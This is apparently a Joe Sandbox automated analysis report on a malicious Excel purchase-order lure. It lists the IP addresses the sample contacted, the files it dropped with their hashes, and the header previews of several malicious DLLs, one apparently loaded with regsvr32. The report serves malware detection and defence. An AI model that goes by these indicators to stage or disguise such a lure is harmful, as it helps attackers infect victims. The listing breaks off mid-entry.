103.132.242.26	unknown	India	45117	INPL-IN-APIshansNetworkIN	true
104.168.155.143	unknown	United States	54290	HOSTWINDSUS	true
79.137.35.198	unknown	France	16276	OVHFR	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
172.104.251.154	unknown	United States	63949	LINODE-APLinodeLLCUS	true
115.68.227.76	unknown	Korea Republic of	38700	SMILESERV-AS-KRSMILESERVKR	true
81.68.152.197	ly.yjlianyi.top	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	false
163.44.196.120	unknown	Singapore	135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true
206.189.28.199	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
45.63.99.23	unknown	United States	20473	AS-CHOOPAUS	true
107.170.39.149	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
197.242.150.244	unknown	South Africa	37611	AfrihostZA	true
185.4.135.165	unknown	Greece	199246	TOPHOSTGR	true
183.111.227.137	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
139.59.56.73	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
169.57.156.166	unknown	United States	36351	SOFTLAYERUS	true
175.98.167.165	datie-tw.com	Taiwan; Republic of China (ROC)	9924	TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi	false
164.68.99.3	unknown	Germany	51167	CONTABODE	true
139.59.126.41	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
167.172.253.162	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
147.139.166.154	unknown	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
202.129.205.3	unknown	Thailand	45328	NIPA-AS-THNIPATECHNOLOGYCOLTDTH	true
167.172.199.165	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
153.92.5.27	unknown	Germany	47583	AS-HOSTINGERLT	true
159.65.140.115	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
159.65.88.10	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
172.105.226.75	unknown	United States	63949	LINODE-APLinodeLLCUS	true
164.90.222.65	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
213.239.212.5	unknown	Germany	24940	HETZNER-ASDE	true
5.135.159.50	unknown	France	16276	OVHFR	true
173.255.211.88	unknown	United States	63949	LINODE-APLinodeLLCUS	true
212.24.98.99	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
186.194.240.217	unknown	Brazil	262733	NetceteraTelecomunicacoesLtdaBR	true
91.187.140.35	unknown	Serbia	13092	UB-ASRS	true
119.59.103.152	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
159.89.202.34	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
201.94.166.162	unknown	Brazil	28573	CLAROSABR	true
160.16.142.56	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
91.207.28.33	unknown	Kyrgyzstan	39819	PROHOSTKG	true
103.43.75.120	unknown	Japan	20473	AS-CHOOPAUS	true
188.44.20.25	unknown	Macedonia	57374	GIV-ASMK	true
45.235.8.30	unknown	Brazil	267405	WIKINETTELECOMUNICACOESBR	true
153.126.146.25	unknown	Japan	7684	SAKURA-ASAKURAInternetIncJP	true
72.15.201.15	unknown	United States	13649	ASN-VINSUS	true
82.223.21.224	unknown	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
47.92.35.35	sbm.xinmoshiwang.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
95.217.221.146	unknown	Germany	24940	HETZNER-ASDE	true
41.63.0.22	copunupo.ac.zm	Zambia	37532	ZAMRENZM	false
149.56.131.28	unknown	Canada	16276	OVHFR	true
209.97.163.214	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
182.162.143.56	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
1.234.2.232	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
94.23.45.86	unknown	France	16276	OVHFR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	745091
Start date and time:	2022-11-13 19:26:14 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	PO0000001552.xls
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@11/15@4/59
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 67.7% (good quality ratio 58.8%) Quality average: 65.2% Quality standard deviation: 35.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xls

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 52.109.76.141, 52.109.77.0, 52.113.194.132, 52.109.89.14, 88.221.168.226, 13.69.239.73
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdneu03.northeurope.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:27:45	API Interceptor	6x Sleep call for process: regsvr32.exe modified

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	JSON data
Category:	dropped
Size (bytes):	379722
Entropy (8bit):	4.9088149211082355
Encrypted:	false
SSDEEP:	1536:MApDpphudnceJZezca9uRszBEmj6QkjfoJ5Jj7DMnDAYRbLSm5rYOLdHKmC9:lDThumeGzcTRszB7DkjfaJj76RbNbLW9
MD5:	E9FB5A0DF105C6F7F80E8B650DF56AAB
SHA1:	0B7F6ADA05673F2535E61267C3CB428489ECEB55
SHA-256:	A24470762A1F9F5F069C0F70EF53D693D08B7C99797935800FF294BD3B2566F3
SHA-512:	65C83135CE550981ED88CB4A83127CB3C94D5C616F26B05185FCC129E5201A88EB0A1351D144E1511B50ADB388071BFCC60388FDD613EBBA5B202FFC76F7D42B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"MajorVersion":4,"MinorVersion":17,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"31150835240","p":[2,11,8,4,2,2,2,2,2,4],"sub":[],"t":"ttf","u":[3,0,0,0],"v":67502,"w":45875968},{"c":[536870913,0],"dn":"Agency FB","fs":52680,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"29260917085","p":[2,11,5,3,2,2,2,2,

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview.ttf

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_17RegularVersion 4.17;O365
Category:	dropped
Size (bytes):	672416
Entropy (8bit):	6.566110770587873
Encrypted:	false
SSDEEP:	12288:/3zUbLds556T1BEFGHtASk3+/KLQ/zp1km/WJ1ov0mPqxXE/RoVZPE9Ob:/Qfds5opwSL1kovT92
MD5:	4DFB7AADD4771ADDF1BA168C12DEDBF3
SHA1:	B379DC0E19FE0F51E77305BE0A7F3421B80E8A0F
SHA-256:	DB9B46CC2132D76EF90CA9A59AF03CB478BB91EA2CDA3E8E42DD0801873416E2
SHA-512:	1C5AE2C794017A81A4232A2EF43725A0DA30F9672123940D85D34A4A77744D2D7ECA5FFE9A91E2FEDDBDBADE4EEAD6AB80E565C1F8FBB813C5A2BC25F7F0A359
Malicious:	false
Preview:	........... OS/29.P...(...`cmap.s.........pglyf..e.......0.head-@;,.......6hheaE.@B.......$hmtx...........ploca..@....h...tmaxp........... name.T+...A\|....post...<..B.... ........Me.._.<...........<.............Aa.x.................Q....Aa....Aa.........................~...........................j.......................3..............................MS .@.......(...Q................. ...........d.......0...J.......8...>..........+a..#...,................K.......z...............N.........!...-...+....z.......h..%^..3...&j..+...+%.."....................l......$A...,.......g...&...=.......X..&..............&...(B...............#.......j...............+...P...5...@...)..........#...............N...7......<...;>.............. ]...........5......#....s.......$.......$.......^...................H.......%...7.......6.......O...V...........K.......c......!...........$...&...p..+<..+...-....q.......O...................F..(....5..0K..$...0V...k..e...o...........S......0..0...*M......9...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E9097BEB-F41B-41FA-A529-2854DCDBD67E

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	150846
Entropy (8bit):	5.357322582686688
Encrypted:	false
SSDEEP:	1536:h+C7/gd3B4BQguw//Q9DQe+zQVk4F77nXmvidOXRsEwrNz6S:BHQ9DQe+zbXza
MD5:	322904D0B0020748A8ABC41788D78D9F
SHA1:	4CD879E03CEA5D5FEAEAB7BD9614BD392BADD8D1
SHA-256:	BF4C38ADA89E2623EC0AE27071BA770C6B7AE2966C93717F05B109E2FEDD38E4
SHA-512:	B90C3082BCFB5DC3F0A4D5E653DAA94950B3D7CFF1B14864291DBBC0775DEB5081F81033C916EA78C6E3A36F3CCCC22C612B0D158769E6C6A7FDA891CE33C9C5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-11-13T18:26:46">.. Build: 16.0.15905.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	338423
Entropy (8bit):	5.1629516010869905
Encrypted:	false
SSDEEP:	1536:42/zodZJr6KP+1u6uSivsUQK75IthK8nF2XuN:VOr6KP+1u6uSivsUQK75IthYXU
MD5:	4FF54C343D309A7F69BD16B392F8C3A3
SHA1:	AC4012E403854396974652804E46E5406B23E492
SHA-256:	DBD62290F655ACCC6686A46A62909475980AA09102B3A0D7BAF2278B4DBA56AC
SHA-512:	0268D2B5D833AECB6AD08619F8C08254958978C66CEE156B61A52FE442AB5DB0F9BD12FF9D3CFC1C2E2A2858A8D8D32D2AE361DF3D9610E135A97A12664E0E9B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8418307979091164
Encrypted:	false
SSDEEP:	48:uiTrlKxsxxHxl9Il8utFJfX3b5y2R1eN66LY0d1rc:vTYrFJfX4iQYz
MD5:	3AE033F53B76D362C4A93629A0419482
SHA1:	14ED84431F31521E6327C666D1D2EC766E392016
SHA-256:	8C47A04565A320D35B265549BC11BED0BDCB001BCC28028638B4C8330324A270
SHA-512:	140863AA0784A3A57F4E0F9C0020A895E5D3FAE80ADF5F01EF80CA346B5C8CE4293FD788C0C43B685E3BD1BFD953A8155DF1E4AA647D3CCEA8C39F49AAD10E26
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.O.I.i.4.J.X.3.2.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.907754828884943
Encrypted:	false
SSDEEP:	48:uiTrlKxJx+xl9Il8uaz7HYRtKu9pEV2EpNYn549Ymca2d/vc:vYMPHQGV2EpNaYnT
MD5:	25F51D45674CF9EC3EEEFA2D89F736B0
SHA1:	50A2C33FE720343EDFFC4DCBA09F832901FD819A
SHA-256:	46DC8D20C16586691C4ED93B0B45AE530C67837B927BD79314D4EA62FD1C4FDE
SHA-512:	D8D4709354EC7D3A66CB79CA0C3DF507B67CEF3B4AD63344694DAA5FB03C99F8A88A81659E1B53F949167B929AF0B5DD7A9C94044D460F21C1757466065CA5FD
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".F.+.R.0.9.1.4.W.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\9aad439831564ef9f88438a70a63c87e26ef3852.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	3902
Entropy (8bit):	3.9837858181337045
Encrypted:	false
SSDEEP:	96:GzYVH0Ed0sgxZ/xv8uyIefnFVIaBy5LgVtNKrkqq:6pEerxhxvxyIGVyFgVt8Lq
MD5:	B14B26190EE6FABE32EAB2F9EE926454
SHA1:	84F8AE7E2451837C856F2ABF6AC98CD24B0B4EE9
SHA-256:	071A156E540064BA81D051C98C3F2317E0ECE6440D2C76E6E5A40F17959B9983
SHA-512:	E437437F20A6B6D8CE7FB1BDB73E5001F1B85D7A678202A98DB56D282C17FE712159BD276AE307E5130F546B1CB0D7CA820398E561B059FDBC63DFB2C9EE38ED
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".m.q.1.D.m.D.F.W.T.v.n.4.h.D.i.n.C.m.P.I.f.i.b.v.O.F.I.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.I.W.6.x.Y.3.3.2.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.773063357716462
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	DD7105E9748A29B5BD61EA57214D57E3
SHA1:	827B323BDA769BA7FB838A231AA4160209266B14
SHA-256:	C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
SHA-512:	BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.7730613530277655
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	3929B889987F447CB837ED326860AFC6
SHA1:	9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
SHA-256:	B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
SHA-512:	EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO0000001552.LNK

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 30 12:46:13 2022, mtime=Sun Nov 13 17:26:48 2022, atime=Sun Nov 13 17:26:48 2022, length=93184, window=hide
Category:	dropped
Size (bytes):	527
Entropy (8bit):	4.687349495162638
Encrypted:	false
SSDEEP:	6:4xtQl37wc4esXsbxSXzK9wm2PholjAlpYelsgFUiILlaWUdPFmJXSZXASzZXyav8:87c4xsbx4zK9wm2SjA0Jaldi3Fm2
MD5:	732950BB2A1CFEF84B6969CFFE0ABDE7
SHA1:	D674D7EFF59B48E8A8749F8D5C2801B6E3CE87DA
SHA-256:	6FDB0C9FA6FC38384EE7B77C0D481EBF5F9D771C29739A7DAF62E54626568E28
SHA-512:	290B32795635A528AD9CF40553B7ABFB6D44CD2558C4DF37F92E30B585562982D4E60253F7CE6F55F95BE5F8C6AC4ABEC0C1ABE45148FCB66C9D6BD9BE40A4CB
Malicious:	false
Preview:	L..................F.... ....:..v...(.!~.....R.~.....l......................p.n.2..l..mUU. .PO0000~1.XLS..R.......U.mmUU......^....................q...P.O.0.0.0.0.0.0.1.5.5.2...x.l.s.......X...............-.......W...........;S.......C:\Users\user\Desktop\PO0000001552.xls..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.0.0.0.0.0.0.1.5.5.2...x.l.s.`.......X.......134349..........N...n..O...}R......i(..........N...n..O...}R......i(..........E.......9...1SPS..mD..pH.H@..=x.....h....H....F.5./EG.gM.U..............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Generic INItialization configuration [xls]
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.363995491825093
Encrypted:	false
SSDEEP:	3:bDuMJltOvCpulmMYdvCpulv:bCmOaEYdac
MD5:	F9CBF4D309E73196DBCB3C5F14717F77
SHA1:	26353BE9CD1B9EBDCE83B69267B48D80472BC7A6
SHA-256:	7CB5B3C956A55B3E4A70A8DA7615CAF7D7960B89BFE00C0EC8553680BF87150F
SHA-512:	47D359B978738F514DD3735DF520D1ACF9A55EAAF49C9A30D902342F345D74CCA24D323ABD0CC75CE7C2AAB3CA0FBACD2E62F07624AF55501CA39355E8EB552B
Malicious:	false
Preview:	[folders]..Templates.LNK=0..PO0000001552.LNK=0..[xls]..PO0000001552.LNK=0..

C:\Users\user\elv2.ooocccxxx

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	433152
Entropy (8bit):	6.7730613530277655
Encrypted:	false
SSDEEP:	6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
MD5:	3929B889987F447CB837ED326860AFC6
SHA1:	9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
SHA-256:	B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
